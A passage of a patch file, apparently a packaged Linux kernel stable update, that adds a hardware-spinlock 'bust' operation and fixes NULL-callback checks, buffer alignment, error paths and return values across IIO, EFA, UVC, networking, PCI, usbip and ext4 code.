++ * long as the current owner of the lock matches the id given by the caller.
++ *
++ * Context: Process context.
++ *
++ * Returns: 0 on success, or -EINVAL if the hwspinlock does not exist, or
++ * the bust operation fails, and -EOPNOTSUPP if the bust operation is not
++ * defined for the hwspinlock.
++ */
++int hwspin_lock_bust(struct hwspinlock *hwlock, unsigned int id)
++{
++	if (WARN_ON(!hwlock))
++		return -EINVAL;
++
++	if (!hwlock->bank->ops->bust) {
++		pr_err("bust operation not defined\n");
++		return -EOPNOTSUPP;
++	}
++
++	return hwlock->bank->ops->bust(hwlock, id);
++}
++EXPORT_SYMBOL_GPL(hwspin_lock_bust);
++
+ /**
+  * of_hwspin_lock_simple_xlate - translate hwlock_spec to return a lock id
+  * @bank: the hwspinlock device bank
+diff --git a/drivers/hwspinlock/hwspinlock_internal.h b/drivers/hwspinlock/hwspinlock_internal.h
+index 29892767bb7a0..f298fc0ee5adb 100644
+--- a/drivers/hwspinlock/hwspinlock_internal.h
++++ b/drivers/hwspinlock/hwspinlock_internal.h
+@@ -21,6 +21,8 @@ struct hwspinlock_device;
+  * @trylock: make a single attempt to take the lock. returns 0 on
+  *	     failure and true on success. may _not_ sleep.
+  * @unlock:  release the lock. always succeed. may _not_ sleep.
++ * @bust:    optional, platform-specific bust handler, called by hwspinlock
++ *	     core to bust a specific lock.
+  * @relax:   optional, platform-specific relax handler, called by hwspinlock
+  *	     core while spinning on a lock, between two successive
+  *	     invocations of @trylock. may _not_ sleep.
+@@ -28,6 +30,7 @@ struct hwspinlock_device;
+ struct hwspinlock_ops {
+ 	int (*trylock)(struct hwspinlock *lock);
+ 	void (*unlock)(struct hwspinlock *lock);
++	int (*bust)(struct hwspinlock *lock, unsigned int id);
+ 	void (*relax)(struct hwspinlock *lock);
+ };
+ 
+diff --git a/drivers/iio/industrialio-core.c b/drivers/iio/industrialio-core.c
+index 135a86fc94531..162845543efe0 100644
+--- a/drivers/iio/industrialio-core.c
++++ b/drivers/iio/industrialio-core.c
+@@ -767,9 +767,11 @@ static ssize_t iio_read_channel_info(struct device *dev,
+ 							INDIO_MAX_RAW_ELEMENTS,
+ 							vals, &val_len,
+ 							this_attr->address);
+-	else
++	else if (indio_dev->info->read_raw)
+ 		ret = indio_dev->info->read_raw(indio_dev, this_attr->c,
+ 				    &vals[0], &vals[1], this_attr->address);
++	else
++		return -EINVAL;
+ 
+ 	if (ret < 0)
+ 		return ret;
+@@ -851,6 +853,9 @@ static ssize_t iio_read_channel_info_avail(struct device *dev,
+ 	int length;
+ 	int type;
+ 
++	if (!indio_dev->info->read_avail)
++		return -EINVAL;
++
+ 	ret = indio_dev->info->read_avail(indio_dev, this_attr->c,
+ 					  &vals, &type, &length,
+ 					  this_attr->address);
+diff --git a/drivers/iio/industrialio-event.c b/drivers/iio/industrialio-event.c
+index 727e2ef66aa4b..14658b41c9bc6 100644
+--- a/drivers/iio/industrialio-event.c
++++ b/drivers/iio/industrialio-event.c
+@@ -283,6 +283,9 @@ static ssize_t iio_ev_state_store(struct device *dev,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (!indio_dev->info->write_event_config)
++		return -EINVAL;
++
+ 	ret = indio_dev->info->write_event_config(indio_dev,
+ 		this_attr->c, iio_ev_attr_type(this_attr),
+ 		iio_ev_attr_dir(this_attr), val);
+@@ -298,6 +301,9 @@ static ssize_t iio_ev_state_show(struct device *dev,
+ 	struct iio_dev_attr *this_attr = to_iio_dev_attr(attr);
+ 	int val;
+ 
++	if (!indio_dev->info->read_event_config)
++		return -EINVAL;
++
+ 	val = indio_dev->info->read_event_config(indio_dev,
+ 		this_attr->c, iio_ev_attr_type(this_attr),
+ 		iio_ev_attr_dir(this_attr));
+@@ -316,6 +322,9 @@ static ssize_t iio_ev_value_show(struct device *dev,
+ 	int val, val2, val_arr[2];
+ 	int ret;
+ 
++	if (!indio_dev->info->read_event_value)
++		return -EINVAL;
++
+ 	ret = indio_dev->info->read_event_value(indio_dev,
+ 		this_attr->c, iio_ev_attr_type(this_attr),
+ 		iio_ev_attr_dir(this_attr), iio_ev_attr_info(this_attr),
+diff --git a/drivers/iio/inkern.c b/drivers/iio/inkern.c
+index 872fd5c241476..bd854e92c6f8c 100644
+--- a/drivers/iio/inkern.c
++++ b/drivers/iio/inkern.c
+@@ -561,6 +561,7 @@ EXPORT_SYMBOL_GPL(devm_iio_channel_get_all);
+ static int iio_channel_read(struct iio_channel *chan, int *val, int *val2,
+ 			    enum iio_chan_info_enum info)
+ {
++	const struct iio_info *iio_info = chan->indio_dev->info;
+ 	int unused;
+ 	int vals[INDIO_MAX_RAW_ELEMENTS];
+ 	int ret;
+@@ -572,15 +573,18 @@ static int iio_channel_read(struct iio_channel *chan, int *val, int *val2,
+ 	if (!iio_channel_has_info(chan->channel, info))
+ 		return -EINVAL;
+ 
+-	if (chan->indio_dev->info->read_raw_multi) {
+-		ret = chan->indio_dev->info->read_raw_multi(chan->indio_dev,
+-					chan->channel, INDIO_MAX_RAW_ELEMENTS,
+-					vals, &val_len, info);
++	if (iio_info->read_raw_multi) {
++		ret = iio_info->read_raw_multi(chan->indio_dev,
++					       chan->channel,
++					       INDIO_MAX_RAW_ELEMENTS,
++					       vals, &val_len, info);
+ 		*val = vals[0];
+ 		*val2 = vals[1];
++	} else if (iio_info->read_raw) {
++		ret = iio_info->read_raw(chan->indio_dev,
++					 chan->channel, val, val2, info);
+ 	} else {
+-		ret = chan->indio_dev->info->read_raw(chan->indio_dev,
+-					chan->channel, val, val2, info);
++		return -EINVAL;
+ 	}
+ 
+ 	return ret;
+@@ -800,11 +804,15 @@ static int iio_channel_read_avail(struct iio_channel *chan,
+ 				  const int **vals, int *type, int *length,
+ 				  enum iio_chan_info_enum info)
+ {
++	const struct iio_info *iio_info = chan->indio_dev->info;
++
+ 	if (!iio_channel_has_available(chan->channel, info))
+ 		return -EINVAL;
+ 
+-	return chan->indio_dev->info->read_avail(chan->indio_dev, chan->channel,
+-						 vals, type, length, info);
++	if (iio_info->read_avail)
++		return iio_info->read_avail(chan->indio_dev, chan->channel,
++					    vals, type, length, info);
++	return -EINVAL;
+ }
+ 
+ int iio_read_avail_channel_attribute(struct iio_channel *chan,
+@@ -935,8 +943,12 @@ EXPORT_SYMBOL_GPL(iio_get_channel_type);
+ static int iio_channel_write(struct iio_channel *chan, int val, int val2,
+ 			     enum iio_chan_info_enum info)
+ {
+-	return chan->indio_dev->info->write_raw(chan->indio_dev,
+-						chan->channel, val, val2, info);
++	const struct iio_info *iio_info = chan->indio_dev->info;
++
++	if (iio_info->write_raw)
++		return iio_info->write_raw(chan->indio_dev,
++					   chan->channel, val, val2, info);
++	return -EINVAL;
+ }
+ 
+ int iio_write_channel_attribute(struct iio_channel *chan, int val, int val2,
+diff --git a/drivers/infiniband/hw/efa/efa_com.c b/drivers/infiniband/hw/efa/efa_com.c
+index 16a24a05fc2a6..bafd210dd43e8 100644
+--- a/drivers/infiniband/hw/efa/efa_com.c
++++ b/drivers/infiniband/hw/efa/efa_com.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0 OR BSD-2-Clause
+ /*
+- * Copyright 2018-2021 Amazon.com, Inc. or its affiliates. All rights reserved.
++ * Copyright 2018-2024 Amazon.com, Inc. or its affiliates. All rights reserved.
+  */
+ 
+ #include "efa_com.h"
+@@ -406,8 +406,8 @@ static struct efa_comp_ctx *efa_com_submit_admin_cmd(struct efa_com_admin_queue
+ 	return comp_ctx;
+ }
+ 
+-static void efa_com_handle_single_admin_completion(struct efa_com_admin_queue *aq,
+-						   struct efa_admin_acq_entry *cqe)
++static int efa_com_handle_single_admin_completion(struct efa_com_admin_queue *aq,
++						  struct efa_admin_acq_entry *cqe)
+ {
+ 	struct efa_comp_ctx *comp_ctx;
+ 	u16 cmd_id;
+@@ -416,11 +416,11 @@ static void efa_com_handle_single_admin_completion(struct efa_com_admin_queue *a
+ 			 EFA_ADMIN_ACQ_COMMON_DESC_COMMAND_ID);
+ 
+ 	comp_ctx = efa_com_get_comp_ctx(aq, cmd_id, false);
+-	if (!comp_ctx) {
++	if (comp_ctx->status != EFA_CMD_SUBMITTED) {
+ 		ibdev_err(aq->efa_dev,
+-			  "comp_ctx is NULL. Changing the admin queue running state\n");
+-		clear_bit(EFA_AQ_STATE_RUNNING_BIT, &aq->state);
+-		return;
++			  "Received completion with unexpected command id[%d], sq producer: %d, sq consumer: %d, cq consumer: %d\n",
++			  cmd_id, aq->sq.pc, aq->sq.cc, aq->cq.cc);
++		return -EINVAL;
+ 	}
+ 
+ 	comp_ctx->status = EFA_CMD_COMPLETED;
+@@ -428,14 +428,17 @@ static void efa_com_handle_single_admin_completion(struct efa_com_admin_queue *a
+ 
+ 	if (!test_bit(EFA_AQ_STATE_POLLING_BIT, &aq->state))
+ 		complete(&comp_ctx->wait_event);
++
++	return 0;
+ }
+ 
+ static void efa_com_handle_admin_completion(struct efa_com_admin_queue *aq)
+ {
+ 	struct efa_admin_acq_entry *cqe;
+ 	u16 queue_size_mask;
+-	u16 comp_num = 0;
++	u16 comp_cmds = 0;
+ 	u8 phase;
++	int err;
+ 	u16 ci;
+ 
+ 	queue_size_mask = aq->depth - 1;
+@@ -453,10 +456,12 @@ static void efa_com_handle_admin_completion(struct efa_com_admin_queue *aq)
+ 		 * phase bit was validated
+ 		 */
+ 		dma_rmb();
+-		efa_com_handle_single_admin_completion(aq, cqe);
++		err = efa_com_handle_single_admin_completion(aq, cqe);
++		if (!err)
++			comp_cmds++;
+ 
++		aq->cq.cc++;
+ 		ci++;
+-		comp_num++;
+ 		if (ci == aq->depth) {
+ 			ci = 0;
+ 			phase = !phase;
+@@ -465,10 +470,9 @@ static void efa_com_handle_admin_completion(struct efa_com_admin_queue *aq)
+ 		cqe = &aq->cq.entries[ci];
+ 	}
+ 
+-	aq->cq.cc += comp_num;
+ 	aq->cq.phase = phase;
+-	aq->sq.cc += comp_num;
+-	atomic64_add(comp_num, &aq->stats.completed_cmd);
++	aq->sq.cc += comp_cmds;
++	atomic64_add(comp_cmds, &aq->stats.completed_cmd);
+ }
+ 
+ static int efa_com_comp_status_to_errno(u8 comp_status)
+diff --git a/drivers/media/usb/uvc/uvc_driver.c b/drivers/media/usb/uvc/uvc_driver.c
+index 191db831d7606..004511d918c64 100644
+--- a/drivers/media/usb/uvc/uvc_driver.c
++++ b/drivers/media/usb/uvc/uvc_driver.c
+@@ -666,16 +666,26 @@ static int uvc_parse_streaming(struct uvc_device *dev,
+ 		goto error;
+ 	}
+ 
+-	size = nformats * sizeof(*format) + nframes * sizeof(*frame)
++	/*
++	 * Allocate memory for the formats, the frames and the intervals,
++	 * plus any required padding to guarantee that everything has the
++	 * correct alignment.
++	 */
++	size = nformats * sizeof(*format);
++	size = ALIGN(size, __alignof__(*frame)) + nframes * sizeof(*frame);
++	size = ALIGN(size, __alignof__(*interval))
+ 	     + nintervals * sizeof(*interval);
++
+ 	format = kzalloc(size, GFP_KERNEL);
+-	if (format == NULL) {
++	if (!format) {
+ 		ret = -ENOMEM;
+ 		goto error;
+ 	}
+ 
+-	frame = (struct uvc_frame *)&format[nformats];
+-	interval = (u32 *)&frame[nframes];
++	frame = (void *)format + nformats * sizeof(*format);
++	frame = PTR_ALIGN(frame, __alignof__(*frame));
++	interval = (void *)frame + nframes * sizeof(*frame);
++	interval = PTR_ALIGN(interval, __alignof__(*interval));
+ 
+ 	streaming->format = format;
+ 	streaming->nformats = 0;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
+index 97d1cfec4ec03..ccddfa49e96c0 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rx.c
+@@ -2141,7 +2141,8 @@ static void mlx5e_handle_rx_cqe_mpwrq_shampo(struct mlx5e_rq *rq, struct mlx5_cq
+ 	if (flush)
+ 		mlx5e_shampo_flush_skb(rq, cqe, match);
+ free_hd_entry:
+-	mlx5e_free_rx_shampo_hd_entry(rq, header_index);
++	if (likely(head_size))
++		mlx5e_free_rx_shampo_hd_entry(rq, header_index);
+ mpwrq_cqe_out:
+ 	if (likely(wi->consumed_strides < rq->mpwqe.num_strides))
+ 		return;
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index d34aea85f8a69..14865fc245dae 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -230,7 +230,7 @@ static int ionic_request_irq(struct ionic_lif *lif, struct ionic_qcq *qcq)
+ 		name = dev_name(dev);
+ 
+ 	snprintf(intr->name, sizeof(intr->name),
+-		 "%s-%s-%s", IONIC_DRV_NAME, name, q->name);
++		 "%.5s-%.16s-%.8s", IONIC_DRV_NAME, name, q->name);
+ 
+ 	return devm_request_irq(dev, intr->vector, ionic_isr,
+ 				0, intr->name, &qcq->napi);
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index ee0ea3d0f50ee..72a2c41b9dbf8 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1436,6 +1436,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_FIXED_INTF(0x2692, 0x9025, 4)},    /* Cellient MPL200 (rebranded Qualcomm 05c6:9025) */
+ 	{QMI_QUIRK_SET_DTR(0x1546, 0x1342, 4)},	/* u-blox LARA-L6 */
+ 	{QMI_QUIRK_SET_DTR(0x33f8, 0x0104, 4)}, /* Rolling RW101 RMNET */
++	{QMI_FIXED_INTF(0x2dee, 0x4d22, 5)},    /* MeiG Smart SRM825L */
+ 
+ 	/* 4. Gobi 1000 devices */
+ 	{QMI_GOBI1K_DEVICE(0x05c6, 0x9212)},	/* Acer Gobi Modem Device */
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 61cc0ed1ddc13..e3e5107adaca6 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -1638,7 +1638,7 @@ static bool is_xdp_raw_buffer_queue(struct virtnet_info *vi, int q)
+ 		return false;
+ }
+ 
+-static void virtnet_poll_cleantx(struct receive_queue *rq)
++static void virtnet_poll_cleantx(struct receive_queue *rq, int budget)
+ {
+ 	struct virtnet_info *vi = rq->vq->vdev->priv;
+ 	unsigned int index = vq2rxq(rq->vq);
+@@ -1656,7 +1656,7 @@ static void virtnet_poll_cleantx(struct receive_queue *rq)
+ 
+ 		do {
+ 			virtqueue_disable_cb(sq->vq);
+-			free_old_xmit_skbs(sq, true);
++			free_old_xmit_skbs(sq, !!budget);
+ 		} while (unlikely(!virtqueue_enable_cb_delayed(sq->vq)));
+ 
+ 		if (sq->vq->num_free >= 2 + MAX_SKB_FRAGS)
+@@ -1675,7 +1675,7 @@ static int virtnet_poll(struct napi_struct *napi, int budget)
+ 	unsigned int received;
+ 	unsigned int xdp_xmit = 0;
+ 
+-	virtnet_poll_cleantx(rq);
++	virtnet_poll_cleantx(rq, budget);
+ 
+ 	received = virtnet_receive(rq, budget, &xdp_xmit);
+ 
+@@ -1778,7 +1778,7 @@ static int virtnet_poll_tx(struct napi_struct *napi, int budget)
+ 	txq = netdev_get_tx_queue(vi->dev, index);
+ 	__netif_tx_lock(txq, raw_smp_processor_id());
+ 	virtqueue_disable_cb(sq->vq);
+-	free_old_xmit_skbs(sq, true);
++	free_old_xmit_skbs(sq, !!budget);
+ 
+ 	if (sq->vq->num_free >= 2 + MAX_SKB_FRAGS)
+ 		netif_tx_wake_queue(txq);
+diff --git a/drivers/net/wireless/ath/ath11k/qmi.c b/drivers/net/wireless/ath/ath11k/qmi.c
+index 01b02c03fa89c..764cd320c6c18 100644
+--- a/drivers/net/wireless/ath/ath11k/qmi.c
++++ b/drivers/net/wireless/ath/ath11k/qmi.c
+@@ -2293,7 +2293,7 @@ static int ath11k_qmi_load_file_target_mem(struct ath11k_base *ab,
+ 	struct qmi_txn txn;
+ 	const u8 *temp = data;
+ 	void __iomem *bdf_addr = NULL;
+-	int ret;
++	int ret = 0;
+ 	u32 remaining = len;
+ 
+ 	req = kzalloc(sizeof(*req), GFP_KERNEL);
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+index 7d4340c56628a..51bb544853514 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+@@ -252,8 +252,7 @@ static ssize_t iwl_dbgfs_send_hcmd_write(struct iwl_fw_runtime *fwrt, char *buf,
+ 		.data = { NULL, },
+ 	};
+ 
+-	if (fwrt->ops && fwrt->ops->fw_running &&
+-	    !fwrt->ops->fw_running(fwrt->ops_ctx))
++	if (!iwl_trans_fw_running(fwrt->trans))
+ 		return -EIO;
+ 
+ 	if (count < header_size + 1 || count > 1024 * 4)
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/runtime.h b/drivers/net/wireless/intel/iwlwifi/fw/runtime.h
+index d3cb1ae68a96c..7b7bf3aecc143 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/runtime.h
++++ b/drivers/net/wireless/intel/iwlwifi/fw/runtime.h
+@@ -18,7 +18,6 @@
+ struct iwl_fw_runtime_ops {
+ 	void (*dump_start)(void *ctx);
+ 	void (*dump_end)(void *ctx);
+-	bool (*fw_running)(void *ctx);
+ 	int (*send_hcmd)(void *ctx, struct iwl_host_cmd *host_cmd);
+ 	bool (*d3_debug_enable)(void *ctx);
+ };
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+index 864f5fb260409..88b6d4e566c40 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+@@ -670,11 +670,6 @@ static void iwl_mvm_fwrt_dump_end(void *ctx)
+ 	mutex_unlock(&mvm->mutex);
+ }
+ 
+-static bool iwl_mvm_fwrt_fw_running(void *ctx)
+-{
+-	return iwl_mvm_firmware_running(ctx);
+-}
+-
+ static int iwl_mvm_fwrt_send_hcmd(void *ctx, struct iwl_host_cmd *host_cmd)
+ {
+ 	struct iwl_mvm *mvm = (struct iwl_mvm *)ctx;
+@@ -695,7 +690,6 @@ static bool iwl_mvm_d3_debug_enable(void *ctx)
+ static const struct iwl_fw_runtime_ops iwl_mvm_fwrt_ops = {
+ 	.dump_start = iwl_mvm_fwrt_dump_start,
+ 	.dump_end = iwl_mvm_fwrt_dump_end,
+-	.fw_running = iwl_mvm_fwrt_fw_running,
+ 	.send_hcmd = iwl_mvm_fwrt_send_hcmd,
+ 	.d3_debug_enable = iwl_mvm_d3_debug_enable,
+ };
+diff --git a/drivers/net/wireless/realtek/rtw89/ser.c b/drivers/net/wireless/realtek/rtw89/ser.c
+index c1a4bc1c64d16..afb1b41e1a9a5 100644
+--- a/drivers/net/wireless/realtek/rtw89/ser.c
++++ b/drivers/net/wireless/realtek/rtw89/ser.c
+@@ -304,9 +304,13 @@ static void ser_reset_vif(struct rtw89_dev *rtwdev, struct rtw89_vif *rtwvif)
+ 
+ static void ser_sta_deinit_cam_iter(void *data, struct ieee80211_sta *sta)
+ {
+-	struct rtw89_vif *rtwvif = (struct rtw89_vif *)data;
+-	struct rtw89_dev *rtwdev = rtwvif->rtwdev;
++	struct rtw89_vif *target_rtwvif = (struct rtw89_vif *)data;
+ 	struct rtw89_sta *rtwsta = (struct rtw89_sta *)sta->drv_priv;
++	struct rtw89_vif *rtwvif = rtwsta->rtwvif;
++	struct rtw89_dev *rtwdev = rtwvif->rtwdev;
++
++	if (rtwvif != target_rtwvif)
++		return;
+ 
+ 	if (rtwvif->net_type == RTW89_NET_TYPE_AP_MODE || sta->tdls)
+ 		rtw89_cam_deinit_addr_cam(rtwdev, &rtwsta->addr_cam);
+diff --git a/drivers/pci/controller/dwc/pcie-al.c b/drivers/pci/controller/dwc/pcie-al.c
+index b8cb77c9c4bd2..3132b27bc0064 100644
+--- a/drivers/pci/controller/dwc/pcie-al.c
++++ b/drivers/pci/controller/dwc/pcie-al.c
+@@ -242,18 +242,24 @@ static struct pci_ops al_child_pci_ops = {
+ 	.write = pci_generic_config_write,
+ };
+ 
+-static void al_pcie_config_prepare(struct al_pcie *pcie)
++static int al_pcie_config_prepare(struct al_pcie *pcie)
+ {
+ 	struct al_pcie_target_bus_cfg *target_bus_cfg;
+ 	struct dw_pcie_rp *pp = &pcie->pci->pp;
+ 	unsigned int ecam_bus_mask;
++	struct resource_entry *ft;
+ 	u32 cfg_control_offset;
++	struct resource *bus;
+ 	u8 subordinate_bus;
+ 	u8 secondary_bus;
+ 	u32 cfg_control;
+ 	u32 reg;
+-	struct resource *bus = resource_list_first_type(&pp->bridge->windows, IORESOURCE_BUS)->res;
+ 
++	ft = resource_list_first_type(&pp->bridge->windows, IORESOURCE_BUS);
++	if (!ft)
++		return -ENODEV;
++
++	bus = ft->res;
+ 	target_bus_cfg = &pcie->target_bus_cfg;
+ 
+ 	ecam_bus_mask = (pcie->ecam_size >> PCIE_ECAM_BUS_SHIFT) - 1;
+@@ -287,6 +293,8 @@ static void al_pcie_config_prepare(struct al_pcie *pcie)
+ 	       FIELD_PREP(CFG_CONTROL_SEC_BUS_MASK, secondary_bus);
+ 
+ 	al_pcie_controller_writel(pcie, cfg_control_offset, reg);
++
++	return 0;
+ }
+ 
+ static int al_pcie_host_init(struct dw_pcie_rp *pp)
+@@ -305,7 +313,9 @@ static int al_pcie_host_init(struct dw_pcie_rp *pp)
+ 	if (rc)
+ 		return rc;
+ 
+-	al_pcie_config_prepare(pcie);
++	rc = al_pcie_config_prepare(pcie);
++	if (rc)
++		return rc;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/pci/msi/msi.c b/drivers/pci/msi/msi.c
+index fdd2ec09651e9..c5cc3e453fd0c 100644
+--- a/drivers/pci/msi/msi.c
++++ b/drivers/pci/msi/msi.c
+@@ -431,7 +431,7 @@ static int msi_capability_init(struct pci_dev *dev, int nvec,
+ 			       struct irq_affinity *affd)
+ {
+ 	struct irq_affinity_desc *masks = NULL;
+-	struct msi_desc *entry;
++	struct msi_desc *entry, desc;
+ 	int ret;
+ 
+ 	/*
+@@ -452,6 +452,12 @@ static int msi_capability_init(struct pci_dev *dev, int nvec,
+ 	/* All MSIs are unmasked by default; mask them all */
+ 	entry = msi_first_desc(&dev->dev, MSI_DESC_ALL);
+ 	pci_msi_mask(entry, msi_multi_mask(entry));
++	/*
++	 * Copy the MSI descriptor for the error path because
++	 * pci_msi_setup_msi_irqs() will free it for the hierarchical
++	 * interrupt domain case.
++	 */
++	memcpy(&desc, entry, sizeof(desc));
+ 
+ 	/* Configure MSI capability structure */
+ 	ret = pci_msi_setup_msi_irqs(dev, nvec, PCI_CAP_ID_MSI);
+@@ -471,7 +477,7 @@ static int msi_capability_init(struct pci_dev *dev, int nvec,
+ 	goto unlock;
+ 
+ err:
+-	pci_msi_unmask(entry, msi_multi_mask(entry));
++	pci_msi_unmask(&desc, msi_multi_mask(&desc));
+ 	free_msi_irqs(dev);
+ fail:
+ 	dev->msi_enabled = 0;
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index bfed5d36fa2e5..d528ee0092bd2 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -6307,7 +6307,8 @@ static void ufshcd_err_handler(struct work_struct *work)
+ 	if (ufshcd_err_handling_should_stop(hba))
+ 		goto skip_err_handling;
+ 
+-	if (hba->dev_quirks & UFS_DEVICE_QUIRK_RECOVERY_FROM_DL_NAC_ERRORS) {
++	if ((hba->dev_quirks & UFS_DEVICE_QUIRK_RECOVERY_FROM_DL_NAC_ERRORS) &&
++	    !hba->force_reset) {
+ 		bool ret;
+ 
+ 		spin_unlock_irqrestore(hba->host->host_lock, flags);
+diff --git a/drivers/usb/typec/ucsi/ucsi.h b/drivers/usb/typec/ucsi/ucsi.h
+index dbb10cb310d4c..4a1a86e37fd52 100644
+--- a/drivers/usb/typec/ucsi/ucsi.h
++++ b/drivers/usb/typec/ucsi/ucsi.h
+@@ -373,7 +373,7 @@ ucsi_register_displayport(struct ucsi_connector *con,
+ 			  bool override, int offset,
+ 			  struct typec_altmode_desc *desc)
+ {
+-	return NULL;
++	return typec_port_register_altmode(con->port, desc);
+ }
+ 
+ static inline void
+diff --git a/drivers/usb/usbip/stub_rx.c b/drivers/usb/usbip/stub_rx.c
+index fc01b31bbb875..6338d818bc8bc 100644
+--- a/drivers/usb/usbip/stub_rx.c
++++ b/drivers/usb/usbip/stub_rx.c
+@@ -144,53 +144,62 @@ static int tweak_set_configuration_cmd(struct urb *urb)
+ 	if (err && err != -ENODEV)
+ 		dev_err(&sdev->udev->dev, "can't set config #%d, error %d\n",
+ 			config, err);
+-	return 0;
++	return err;
+ }
+ 
+ static int tweak_reset_device_cmd(struct urb *urb)
+ {
+ 	struct stub_priv *priv = (struct stub_priv *) urb->context;
+ 	struct stub_device *sdev = priv->sdev;
++	int err;
+ 
+ 	dev_info(&urb->dev->dev, "usb_queue_reset_device\n");
+ 
+-	if (usb_lock_device_for_reset(sdev->udev, NULL) < 0) {
++	err = usb_lock_device_for_reset(sdev->udev, NULL);
++	if (err < 0) {
+ 		dev_err(&urb->dev->dev, "could not obtain lock to reset device\n");
+-		return 0;
++		return err;
+ 	}
+-	usb_reset_device(sdev->udev);
++	err = usb_reset_device(sdev->udev);
+ 	usb_unlock_device(sdev->udev);
+ 
+-	return 0;
++	return err;
+ }
+ 
+ /*
+  * clear_halt, set_interface, and set_configuration require special tricks.
++ * Returns 1 if request was tweaked, 0 otherwise.
+  */
+-static void tweak_special_requests(struct urb *urb)
++static int tweak_special_requests(struct urb *urb)
+ {
++	int err;
++
+ 	if (!urb || !urb->setup_packet)
+-		return;
++		return 0;
+ 
+ 	if (usb_pipetype(urb->pipe) != PIPE_CONTROL)
+-		return;
++		return 0;
+ 
+ 	if (is_clear_halt_cmd(urb))
+ 		/* tweak clear_halt */
+-		 tweak_clear_halt_cmd(urb);
++		err = tweak_clear_halt_cmd(urb);
+ 
+ 	else if (is_set_interface_cmd(urb))
+ 		/* tweak set_interface */
+-		tweak_set_interface_cmd(urb);
++		err = tweak_set_interface_cmd(urb);
+ 
+ 	else if (is_set_configuration_cmd(urb))
+ 		/* tweak set_configuration */
+-		tweak_set_configuration_cmd(urb);
++		err = tweak_set_configuration_cmd(urb);
+ 
+ 	else if (is_reset_device_cmd(urb))
+-		tweak_reset_device_cmd(urb);
+-	else
++		err = tweak_reset_device_cmd(urb);
++	else {
+ 		usbip_dbg_stub_rx("no need to tweak\n");
++		return 0;
++	}
++
++	return !err;
+ }
+ 
+ /*
+@@ -468,6 +477,7 @@ static void stub_recv_cmd_submit(struct stub_device *sdev,
+ 	int support_sg = 1;
+ 	int np = 0;
+ 	int ret, i;
++	int is_tweaked;
+ 
+ 	if (pipe == -1)
+ 		return;
+@@ -580,8 +590,11 @@ static void stub_recv_cmd_submit(struct stub_device *sdev,
+ 		priv->urbs[i]->pipe = pipe;
+ 		priv->urbs[i]->complete = stub_complete;
+ 
+-		/* no need to submit an intercepted request, but harmless? */
+-		tweak_special_requests(priv->urbs[i]);
++		/*
++		 * all URBs belong to a single PDU, so a global is_tweaked flag is
++		 * enough
++		 */
++		is_tweaked = tweak_special_requests(priv->urbs[i]);
+ 
+ 		masking_bogus_flags(priv->urbs[i]);
+ 	}
+@@ -594,22 +607,32 @@ static void stub_recv_cmd_submit(struct stub_device *sdev,
+ 
+ 	/* urb is now ready to submit */
+ 	for (i = 0; i < priv->num_urbs; i++) {
+-		ret = usb_submit_urb(priv->urbs[i], GFP_KERNEL);
++		if (!is_tweaked) {
++			ret = usb_submit_urb(priv->urbs[i], GFP_KERNEL);
+ 
+-		if (ret == 0)
+-			usbip_dbg_stub_rx("submit urb ok, seqnum %u\n",
+-					pdu->base.seqnum);
+-		else {
+-			dev_err(&udev->dev, "submit_urb error, %d\n", ret);
+-			usbip_dump_header(pdu);
+-			usbip_dump_urb(priv->urbs[i]);
++			if (ret == 0)
++				usbip_dbg_stub_rx("submit urb ok, seqnum %u\n",
++						pdu->base.seqnum);
++			else {
++				dev_err(&udev->dev, "submit_urb error, %d\n", ret);
++				usbip_dump_header(pdu);
++				usbip_dump_urb(priv->urbs[i]);
+ 
++				/*
++				 * Pessimistic.
++				 * This connection will be discarded.
++				 */
++				usbip_event_add(ud, SDEV_EVENT_ERROR_SUBMIT);
++				break;
++			}
++		} else {
+ 			/*
+-			 * Pessimistic.
+-			 * This connection will be discarded.
++			 * An identical URB was already submitted in
++			 * tweak_special_requests(). Skip submitting this URB to not
++			 * duplicate the request.
+ 			 */
+-			usbip_event_add(ud, SDEV_EVENT_ERROR_SUBMIT);
+-			break;
++			priv->urbs[i]->status = 0;
++			stub_complete(priv->urbs[i]);
+ 		}
+ 	}
+ 
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 92b540754799c..e8ee1ccd9a111 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -3229,7 +3229,7 @@ static int ext4_split_extent_at(handle_t *handle,
+ 		ext4_ext_mark_unwritten(ex2);
+ 
+ 	err = ext4_ext_insert_extent(handle, inode, ppath, &newex, flags);
+-	if (err != -ENOSPC && err != -EDQUOT)
++	if (err != -ENOSPC && err != -EDQUOT && err != -ENOMEM)
+ 		goto out;
+ 
